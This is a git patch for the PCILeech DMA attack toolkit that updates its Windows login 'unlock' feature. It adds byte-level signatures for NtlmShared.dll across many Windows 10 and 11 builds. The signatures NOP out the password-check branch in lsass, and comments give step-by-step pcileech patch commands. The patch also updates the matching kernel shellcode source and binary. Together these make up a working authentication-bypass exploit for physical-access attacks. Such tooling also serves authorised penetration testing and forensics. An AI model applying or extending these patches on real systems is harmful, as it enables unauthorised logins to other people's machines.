From 00eff8c8d1aecd69870a776b4e31759592d72912 Mon Sep 17 00:00:00 2001
From: Ulf Frisk <github_ufrisk@frizk.net>
Date: Sun, 26 Nov 2023 17:16:40 +0100
Subject: [PATCH] Version 4.17.5

---
 files/unlock_win10x64.sig        | 111 ++++++++-----
 files/unlock_win11x64.sig        |  32 ++++
 files/wx64_unlock.ksh            | Bin 2677 -> 5177 bytes
 pcileech/pcileech.h              |   2 +-
 pcileech/version.h               |   4 +-
 pcileech_shellcode/wx64_unlock.c | 264 ++++++++++++++++++++-----------
 readme.md                        |   3 +-
 7 files changed, 283 insertions(+), 133 deletions(-)
 create mode 100644 files/unlock_win11x64.sig

diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig
index e4ae1e3..cd01adc 100644
--- a/files/unlock_win10x64.sig
+++ b/files/unlock_win10x64.sig
@@ -1,53 +1,88 @@
-# unlock signature for Windows 10 x64 version
-# syntax: see signature_info.txt for more information.
+# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version
+#
+# Method 1: (faster):
+# 1.1 check pid of lsass.exe: pcileech pslist
+# 1.2 patch: pcileech patch -sig wx64_unlock_win10.sig -all -pid <pid_of_lsass>
+#
+# Method 2:
+# 2.1 patch: pcileech patch -sig wx64_unlock_win10.sig -all
+#
+# Syntax: see signature_info.txt for more information.
+# Generated on 2023-11-26 16:58:59
 #
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384]
-5DF,FF154B1C,5E8,0F8518FB,5E8,909090909090
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
+5DC,488BCBFF154B1C0000,5E8,0F8518FBFFFF,5E8,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0]
-62F,FF15B31B,638,0F8518FB,638,909090909090
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
+65C,488BCBFF15CB1B0000,668,0F8518FBFFFF,668,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0]
-6dF,FF15D31B,6e8,0F8518FB,6e8,909090909090
-# signature for Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791]
-6F5,493BC60F8518FBFFFFB801,6F5,493BC60F8518FBFFFFB801,6F9,84
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
+66C,488BCBFF15BB1B0000,678,0F8518FBFFFF,678,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0]
-615,FF15C51C,61e,0F852EFB,61e,909090909090
-# signature for Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106]
-625,FF15B51C,62e,0F852EFB,62e,909090909090
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
+62C,488BCBFF15B31B0000,638,0F8518FBFFFF,638,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15]
-615,FF15D51C,61e,0F852EFB,61e,909090909090
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
+6DC,488BCBFF15D31B0000,6E8,0F8518FBFFFF,6E8,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1]
-695,FF15551C,69e,0F852EFB,69e,909090909090
-# signature for Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067]
-6AB,493BC60F852EFBFFFFB001,6AB,493BC60F852EFBFFFFB001,6AF,84
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
+6EC,488BCBFF15C31B0000,6F8,0F8518FBFFFF,6F8,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1]
-740,FF15B21B,749,0F840BFBFFFF,749,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
+76C,488BCBFF15431B0000,778,0F8518FBFFFF,778,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1]
-# signature for Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418]
-741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
+77C,488BCBFF15331B0000,788,0F8518FBFFFF,788,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
-426,48FF155320,435,0F84BAFAFFFF,435,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
+622,488BCBFF15B51C0000,62E,0F852EFBFFFF,62E,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
-4B6,48FF15C31F,4C5,0F84BAFAFFFF,4C5,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
+612,488BCBFF15C51C0000,61E,0F852EFBFFFF,61E,909090909090
 #
-# signature for Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
-A6E,48FF15B328,A7D,0F84B2FAFFFF,A7D,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
+622,488BCBFF15C51C0000,62E,0F852EFBFFFF,62E,909090909090
 #
-# signature for Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
-F8B,488BCB48FF,F9D,0F84B2FAFFFF,F9D,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
+612,488BCBFF15D51C0000,61E,0F852EFBFFFF,61E,909090909090
 #
-# signature for Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
-00B,488BCB48FF,01D,0F84B2FAFFFF,01D,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
+6A2,488BCBFF15451C0000,6AE,0F852EFBFFFF,6AE,909090909090
 #
-# signature for Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
-# signature for Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
-FBD,48FF153C23,FCC,0F85C4FAFFFF,FCC,0F85
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
+692,488BCBFF15551C0000,69E,0F852EFBFFFF,69E,909090909090
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
+7CD,488BCBFF15221B0000,7D9,0F840BFBFFFF,7D9,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
+73D,488BCBFF15B21B0000,749,0F840BFBFFFF,749,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
+74D,488BCBFF15A21B0000,759,0F840BFBFFFF,759,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
+7DD,488BCBFF15121B0000,7E9,0F840BFBFFFF,7E9,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
+72F,488BCBFF15C01B0000,73B,0F8409FBFFFF,73B,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
+423,488BCB48FF1553200000,435,0F84BAFAFFFF,435,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
+4B3,488BCB48FF15C31F0000,4C5,0F84BAFAFFFF,4C5,0F85
+#
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
+# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
+4C3,488BCB48FF15B31F0000,4D5,0F84BAFAFFFF,4D5,0F85
diff --git a/files/unlock_win11x64.sig b/files/unlock_win11x64.sig
new file mode 100644
index 0000000..7285ebd
--- /dev/null
+++ b/files/unlock_win11x64.sig
@@ -0,0 +1,32 @@
+# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version
+#
+# Method 1: (faster):
+# 1.1 check pid of lsass.exe: pcileech pslist
+# 1.2 patch: pcileech patch -sig wx64_unlock_win11.sig -all -pid <pid_of_lsass>
+#
+# Method 2:
+# 2.1 patch: pcileech patch -sig wx64_unlock_win11.sig -all
+#
+# Syntax: see signature_info.txt for more information.
+# Generated on 2023-11-26 16:58:59
+#
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
+A7B,488BCB48FF15A3280000,A8D,0F84B2FAFFFF,A8D,0F85
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
+A6B,488BCB48FF15B3280000,A7D,0F84B2FAFFFF,A7D,0F85
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
+00B,488BCB48FF15E3220000,01D,0F84B2FAFFFF,01D,0F85
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
+01B,488BCB48FF15D3220000,02D,0F84B2FAFFFF,02D,0F85
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
+F8B,488BCB48FF1563230000,F9D,0F84B2FAFFFF,F9D,0F85
+#
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
+# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
+FC9,488D4B1048FF152C230000,FDC,0F85C4FAFFFF,FDC,909090909090
diff --git a/files/wx64_unlock.ksh b/files/wx64_unlock.ksh
index 0dca6196f899cff6f344e172e2f32c067500d011..c73ecb7cad173d0ebc5f3d6c00576506b486fa1f 100644
GIT binary patch
literal 5177
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
Hi9P=YPOz;l

delta 1496
zcmXw&e@q)?7{`y&UKyAaHmXDxB&@<*6xoUnWSZ9X*{)J1?w7`xsdLt3>NHZ!Bs0aq
z%dXzK6)R@q#JHHnx#@sKggLi5<z5mI7RTn~k70;e%2p#LjIdRAe(w(Z$MgN(^S+;c
zpZD!`VCnVzhgU92tvXWF)cLYoZJWDq|Kwi{>(n#(Yy0*!U%dBVwCk>!iaoz%2<B&h
zmZ{4MOx@P*UD94}b!?WD8L8!uX{jYuoGi1qH+*S1CdNxL9t+>nH0hm`$07*s1oycr
zCTvzM81cDQ%05@MZoDw7b+ZZPN!>gP^So{vU>bGvHcU7ep>~<#kdI{g7;;>u9>{=9
z-$H(tX%zCSOut3wpCGa-osX(vpX<TT;2%obtPZ{T2wS82Tpk(Lm$Zp7s1(Bo8i)xK
zHfX(7bDqVfjdnad^*{Iw8$oZ&DfG6^gTZ-l`#iV<U<o$8Va2954KNJX#Cp-(HNdIa
z0IAjBNH#Fq3#wM7*kVran_+Z-6{ysi=G0{ZhfLsbOt@d<^aX$uDt%SRskchhk41et
z&=25Lm54J@!UTSdg@p+aLm<wpGz{Wg(j>-o;v$Igq(NLZiOHC79l#aQU!&rCuR0i~
zRDqC2Z`zjDG)^=9co{g&-4HWcIpH;MV$F(xL6x!=;}=*UQx2!wij15v<+5^>7N)VV
zNG2zz+l!36JI%bJm~c1v5|c00`7)XA;k2yWoU>fVD|CFhOm0q<<py45;;Ujtya)IN
zm3%r*GOgt#neh}3==?gJe_W;~IITD1H=F#^F`)zTTflEpX{*k^Ak&MSf?a0(b{&63
z$6uA{HBPU08Sx<#-x(8*0^eoc7Hh_B;KJB$Xt~fMa@H1xHSUeQ3)ih*9oq+Y9Jd!?
z@4<2Q0jeN)?3{H%F-ot>y5I_f5%vjGW}l*Rb_msP*MDzz7`8P>WuHSa96JJ)*-=!^
zj-mSP7Kh5Z1tBc32<tIczcyC;P`!3>1!pJW5>wVRXQ$ybbU8Z<C$30LAwq@K7l-B-
z(He%ebgOIxnh{~65Sg7v<!lVK)M}HYXorA9V)G?*G-sHzahMIof<SJKv&(pRz$!X8
zn}lmUc@w=Wa2mRRuEOe*r=S@8Pl(L^Moo_0)HJOl7vC)@mn4>G%<i{&gyyLUERuUR
zP+iq12C8>vg%<cVRccA(UQ79vTizw#VN^lN)Fj21o|ZCw={bMRpkw!k29~H}v!PHt
z;V2E)T^lEN!mnKLE2COR0dfM$@5l*N2BHC11^&jx4lv&STvRC<)lVrY=aSFi(V&Kv
zX|1CeT{inxiKGP5({-8uN|^x!M)w#))O_z~dkLpFtq(3KKWWBQDQX~k&}H#h;yZE+
z<9l<rm1VakLiLVsYO|#1h8!t##HS>@+D6w>M_+BWR5KK+)CQ%NABy64<Sox$h&@i9
Vqi=P7e0^T2<-m;-O?hW5{{h!wKD+<`

diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index b4e3a1e..3d1bd85 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -19,7 +19,7 @@ typedef long long unsigned int              QWORD, *PQWORD, ULONG64, *PULONG64;
 #endif /* LINUX */
 
 #define SIZE_PAGE_ALIGN_4K(x)                ((x + 0xfff) & ~0xfff)
-#define CONFIG_MAX_SIGNATURES                16
+#define CONFIG_MAX_SIGNATURES                256
 #define PCILEECH_DEVICE_EQUALS(name)         (0 == _stricmp(ctxMain->dev.szDeviceName, name))
 
 #pragma pack(push, 1) /* DISABLE STRUCT PADDINGS (REENABLE AFTER STRUCT DEFINITIONS) */
diff --git a/pcileech/version.h b/pcileech/version.h
index 5b854ba..97e520d 100644
--- a/pcileech/version.h
+++ b/pcileech/version.h
@@ -3,8 +3,8 @@
 
 #define VERSION_MAJOR               4
 #define VERSION_MINOR               17
-#define VERSION_REVISION            4
-#define VERSION_BUILD               45
+#define VERSION_REVISION            5
+#define VERSION_BUILD               46
 
 #define VER_FILE_DESCRIPTION_STR    "The PCILeech Direct Memory Access Attack Toolkit"
 #define VER_FILE_VERSION            VERSION_MAJOR, VERSION_MINOR, VERSION_REVISION, VERSION_BUILD
diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c
index 509387f..e8c0374 100644
--- a/pcileech_shellcode/wx64_unlock.c
+++ b/pcileech_shellcode/wx64_unlock.c
@@ -94,7 +94,7 @@ VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2
 typedef struct tdSignatureChunk {
 	WORD cbOffset;
 	BYTE cb;
-	BYTE pb[6];
+	BYTE pb[12];
 } SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
 
 typedef struct tdSignature {
@@ -129,10 +129,10 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages
 	return E_FAIL;
 }
 
-#define NUMBER_OF_SIGNATURES 20
+#define NUMBER_OF_SIGNATURES 31
 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 {
-	SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = {
+	SIGNATURE oSigs[] = {
 		// win8.1x64 msv1_0.dll (2014-10-29)
 		{ .chunk = {
 			{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } },
@@ -151,110 +151,192 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 			{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } },
 			{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384]
+		// AUTO-GENERATED SIGNATURES BELOW:
+		
+		
+		
+		
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
 		{ .chunk = {
-			{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } },
-			{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
-			{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+			{ .cbOffset = 0x5DC,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4B, 0x1C, 0x00, 0x00 } },
+			{ .cbOffset = 0x5E8,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x5E8,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
 		{ .chunk = {
-			{ .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } },
-			{ .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
-			{ .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+			{ .cbOffset = 0x65C,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xCB, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x668,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x668,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
 		{ .chunk = {
-			{ .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } },
-			{ .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
-			{ .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+			{ .cbOffset = 0x66C,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBB, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x678,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x678,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791]
-		{.chunk = {
-			{.cbOffset = 0x6f5,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x18 } },
-			{.cbOffset = 0x6fb,.cb = 5,.pb = { 0x0FB, 0xFF, 0xFF, 0xB8, 0x01 } },
-			{.cbOffset = 0x6f9,.cb = 1,.pb = { 0x84 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
 		{ .chunk = {
-			{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
-			{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
-			{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+			{ .cbOffset = 0x62C,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB3, 0x1B, 0x00, 0x00 } },
+			{ .cbOffset = 0x638,.cb =  6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
+			{ .cbOffset = 0x638,.cb =  6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
 		},
-		// Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106]
-		{.chunk = {
-			{.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
-			{.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
-			{.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
-		},
-		// Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15]
+		// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
 		{ .chunk = {
-			{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } },
-			{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
-			{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
+			{ .cbOffset = 0x6DC,.cb =  9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD3, 0x1B, 0x00, 0x00 } },
